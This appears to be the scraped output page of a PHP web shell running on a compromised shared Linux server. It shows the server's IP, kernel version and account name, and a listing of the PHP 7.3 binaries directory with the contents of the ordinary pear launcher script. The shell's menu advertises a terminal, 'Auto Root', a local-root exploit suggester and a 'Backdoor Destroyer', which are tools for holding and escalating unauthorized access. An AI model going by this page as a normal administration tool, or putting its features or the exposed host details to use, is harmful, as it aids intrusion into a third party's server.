Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
php73 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
fpmctl
2.38
KB
-rwxr-xr-x
2025-02-25 04:05
lsphp
27.71
MB
-rwxr-xr-x
2024-10-29 06:11
memcapable
276.02
KB
-rwxr-xr-x
2024-10-29 06:21
memcat
83.51
KB
-rwxr-xr-x
2024-10-29 06:21
memcp
82.75
KB
-rwxr-xr-x
2024-10-29 06:21
memdump
73.44
KB
-rwxr-xr-x
2024-10-29 06:21
memerror
63.76
KB
-rwxr-xr-x
2024-10-29 06:21
memexist
71.78
KB
-rwxr-xr-x
2024-10-29 06:21
memflush
70.82
KB
-rwxr-xr-x
2024-10-29 06:21
memparse
35.4
KB
-rwxr-xr-x
2024-10-29 06:21
memping
76.16
KB
-rwxr-xr-x
2024-10-29 06:21
memrm
72.78
KB
-rwxr-xr-x
2024-10-29 06:21
memslap
121.76
KB
-rwxr-xr-x
2024-10-29 06:21
memstat
92.59
KB
-rwxr-xr-x
2024-10-29 06:21
memtouch
72.16
KB
-rwxr-xr-x
2024-10-29 06:21
pear
872
B
-rwxr-xr-x
2024-10-29 05:49
peardev
893
B
-rwxr-xr-x
2024-10-29 05:49
pecl
806
B
-rwxr-xr-x
2024-10-29 05:49
phar
14.48
KB
-rwxr-xr-x
2024-10-29 06:11
phar.phar
14.48
KB
-rwxr-xr-x
2024-10-29 06:11
php
27.8
MB
-rwxr-xr-x
2024-10-29 06:11
php-cgi
27.65
MB
-rwxr-xr-x
2024-10-29 06:11
php-config
5.74
KB
-rwxr-xr-x
2024-10-29 06:11
phpdbg
28.69
MB
-rwxr-xr-x
2024-10-29 06:11
phpize
4.5
KB
-rwxr-xr-x
2024-10-29 06:11
Save
Rename
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/usr/local/apps/php73/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/usr/local/apps/php73/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/usr/local/apps/php73/lib/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/usr/local/apps/php73/lib/php" INCARG="-d include_path=/usr/local/apps/php73/lib/php" fi fi exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"